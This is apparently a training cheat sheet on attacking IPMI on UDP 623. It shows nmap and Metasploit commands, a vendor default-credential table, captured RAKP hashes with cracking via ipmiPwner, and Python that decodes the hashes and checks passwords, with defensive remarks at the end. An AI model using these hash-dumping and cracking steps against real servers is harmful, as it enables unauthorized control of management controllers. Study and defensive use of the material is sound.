IPMI (623 UDP)

Theory

Intelligent Platform Management Interface (IPMI) is a set of standardized specifications for hardware-based host management systems used for system management and monitoring. It acts as an autonomous subsystem and works independently of the host's BIOS, CPU, firmware, and underlying operating system. IPMI provides sysadmins with the ability to manage and monitor systems even if they are powered off or in an unresponsive state.

Version

sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local
msf6 > use auxiliary/scanner/ipmi/ipmi_version 
msf6 auxiliary(scanner/ipmi/ipmi_version) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_version) > show options 

Module options (auxiliary/scanner/ipmi/ipmi_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS     10.129.42.195    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      623              yes       The target port (UDP)
   THREADS    10               yes       The number of concurrent threads


msf6 auxiliary(scanner/ipmi/ipmi_version) > run

[*] Sending IPMI requests to 10.129.42.195->10.129.42.195 (1 hosts)
[+] 10.129.42.195:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0) 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Default password

   Product          Username       Password
   -------          --------       --------
   Dell iDRAC       root           calvin
   HP iLO           Administrator  randomized 8-character string consisting of numbers and uppercase letters
   Supermicro IPMI  ADMIN          ADMIN

Metasploit Wordlists

ls /opt/tools/metasploit-framework/data/wordlists/ | grep ipmi
ipmi_passwords.txt
ipmi_users.txt

Get password

Hashes

Metasploit Dumping Hashes

msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes 
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options 

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                 Current Setting                                                    Required  Description
   ----                 ---------------                                                    --------  -----------
   CRACK_COMMON         true                                                               yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE                                                                     no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                                                        no        Save captured password hashes in john the ripper format
   PASS_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt  yes       File containing common passwords for offline cracking, one per line
   RHOSTS               10.129.42.195                                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                623                                                                yes       The target port
   THREADS              1                                                                  yes       The number of concurrent threads (max one per host)
   USER_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt      yes       File containing usernames, one per line



msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[+] 10.129.42.195:623 - IPMI - Hash found: ADMIN:8e160d4802040000205ee9253b6b8dac3052c837e23faa631260719fce740d45c3139a7dd4317b9ea123456789abcdefa123456789abcdef140541444d494e:a3e82878a09daa8ae3e6c22f9080f8337fe0ed7e
[+] 10.129.42.195:623 - IPMI - Hash for user 'ADMIN' matches password 'ADMIN'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

cat ipmi.txt
a870af384080000fcb12dffed486b2d2307f417d3261a28f099e9b1b0fe99d1f77f2b940cfba668a123456789abcdefa123456789abcdef140561646d696e:9d0c8a64d4b9cf7482ba54a9056e6b147777e025

I don't know why but hashcat didn't find the password :(

ipmiPwner

[Apr 06, 2024 - 05:26:05 (EDT)] exegol-CPTS ipmiPwner # python3 ipmipwner.py --host 10.129.154.218 -u admin -c python -pW /usr/share/wordlists/rockyou.txt -oH hash -oC crackedHash


[*] Checking if port 623 for host 10.129.154.218 is active
[*] The username: admin is valid                                                  
[*] Saving hash for user: admin in file: "hash"
[*] The hash for user: admin
   \_ $rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a
[*] Starting the hash cracking with python

[*] Reading the wordlist by chunks
[*] Chunk size: 1048576
[*] Reading Bytes: 139921497/139921497                                                  
[*] Hash Cracking Started
[+] Password Found, Cracked on line: [613]
[+] The password: trinity
[+] Time elapsed: 0.00254
[+] Result saved in: crackedHash
[Apr 06, 2024 - 05:26:58 (EDT)] exegol-CPTS ipmiPwner # cat crackedHash 
$rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a:t*****y
Time elapsed: 0.00254
[Apr 06, 2024 - 05:27:19 (EDT)] exegol-CPTS ipmiPwner #
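Both kinds of hash line above (the hashcat-style user:salt:hash that ipmi_dumphashes prints and the $rakp$salt$hash that ipmipwner writes) carry the same RAKP message 2 fields: the two session IDs, both random nonces, the BMC GUID, the requested privilege level byte and the username, followed by the HMAC-SHA1 the BMC computed over those bytes with the user's password as key. The Python below is an added example, not code from Metasploit or ipmipwner. It decodes a line into those fields and checks whether a given password reproduces the captured authentication code, which is exactly why a BMC that still has a vendor default password is confirmable offline from one captured line. The sample session (session IDs, nonces, GUID and the root/calvin pairing) is constructed for the example; the field layout follows the IPMI 2.0 RAKP message 2 definition.

```python
"""Decode IPMI 2.0 RAKP hash lines and check a candidate password against them.

Added example, not code from the page's tools.  During RAKP the BMC answers
RAKP message 1 with an HMAC-SHA1, keyed with the user's password, over values
that both sides exchanged in the clear.  ipmi_dumphashes and ipmipwner store
that (salt, hmac) pair, so the pair alone is enough to verify a password.
"""
import hashlib
import hmac
from dataclasses import dataclass

PRIV_LEVELS = {1: "CALLBACK", 2: "USER", 3: "OPERATOR", 4: "ADMINISTRATOR", 5: "OEM"}


@dataclass
class RakpRecord:
    console_session_id: bytes  # SIDm, 4 bytes, chosen by the remote console
    bmc_session_id: bytes      # SIDc, 4 bytes, chosen by the BMC
    console_random: bytes      # Rm, 16 bytes
    bmc_random: bytes          # Rc, 16 bytes
    bmc_guid: bytes            # GUIDc, 16 bytes
    role: int                  # requested max privilege level; bit 4 = name-only lookup
    username: str
    auth_code: bytes           # Key Exchange Authentication Code from RAKP message 2

    @property
    def salt(self) -> bytes:
        """Re-assemble the HMAC input in the order the BMC hashed it."""
        name = self.username.encode("ascii")
        return (self.console_session_id + self.bmc_session_id + self.console_random
                + self.bmc_random + self.bmc_guid + bytes([self.role, len(name)]) + name)

    def role_description(self) -> str:
        level = PRIV_LEVELS.get(self.role & 0x0F, f"unknown({self.role & 0x0F})")
        return level + (" (name-only lookup)" if self.role & 0x10 else "")


def _is_hex(s: str) -> bool:
    return len(s) % 2 == 0 and all(c in "0123456789abcdefABCDEF" for c in s)


def parse_rakp_line(line: str) -> RakpRecord:
    """Accept john ($rakp$<salt>$<hmac>) or hashcat ([user:]<salt>:<hmac>) lines,
    with or without a trailing :<password> appended by a cracked-output file."""
    line = line.strip()
    if line.startswith("$rakp$"):
        salt_hex, rest = line[len("$rakp$"):].split("$", 1)
        auth_hex = rest.split(":", 1)[0]
    else:
        fields = line.split(":")
        for salt_hex, auth_hex in zip(fields, fields[1:]):
            if len(auth_hex) == 40 and _is_hex(salt_hex) and _is_hex(auth_hex):
                break
        else:
            raise ValueError("no <salt>:<hmac> field pair found")
    salt, auth = bytes.fromhex(salt_hex), bytes.fromhex(auth_hex)
    if len(salt) < 58 or len(auth) != 20:
        raise ValueError("salt shorter than the fixed RAKP header or HMAC not 20 bytes")
    ulen = salt[57]
    if len(salt) != 58 + ulen:
        raise ValueError(f"username length byte {ulen} does not match salt length")
    return RakpRecord(salt[0:4], salt[4:8], salt[8:24], salt[24:40], salt[40:56],
                      salt[56], salt[58:].decode("ascii"), auth)


def password_matches(record: RakpRecord, password: str) -> bool:
    """True when HMAC-SHA1(password, salt) reproduces the captured auth code.
    HMAC zero-pads short keys, so the raw password equals the padded user key."""
    digest = hmac.new(password.encode(), record.salt, hashlib.sha1).digest()
    return hmac.compare_digest(digest, record.auth_code)


def bmc_rakp2_line(record: RakpRecord, password: str) -> str:
    """BMC side, constructed for this example: the line a BMC holding `password`
    for this session would cause the dumping tools to write (john format)."""
    code = hmac.new(password.encode(), record.salt, hashlib.sha1).hexdigest()
    return f"$rakp${record.salt.hex()}${code}"


# Constructed sample session (not a real capture): a lab BMC whose 'root' user
# still carries the Dell iDRAC default password from the table above.
SAMPLE_RECORD = RakpRecord(
    console_session_id=bytes.fromhex("a4a3a2a0"),
    bmc_session_id=bytes.fromhex("02000000"),
    console_random=bytes(range(16)),
    bmc_random=bytes(range(16, 32)),
    bmc_guid=bytes.fromhex("00112233445566778899aabbccddeeff"),
    role=0x14, username="root", auth_code=b"\x00" * 20)
SAMPLE_LINE = bmc_rakp2_line(SAMPLE_RECORD, "calvin")

if __name__ == "__main__":
    rec = parse_rakp_line(SAMPLE_LINE)
    print(rec.username, rec.role_description(), rec.bmc_guid.hex())
    print("default credential still set:", password_matches(rec, "calvin"))
```

The role byte 0x14 seen in every line on this page decodes to Administrator with the name-only lookup bit set, so each captured line is tied to a named account and the privilege the console asked for. Because the BMC returns this value before the console has proven anything, the exposure is removed only by changing vendor default passwords and keeping UDP 623 off networks that untrusted hosts can reach; password_matches run against the default table above tells a defender which captured lines still correspond to a factory credential.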
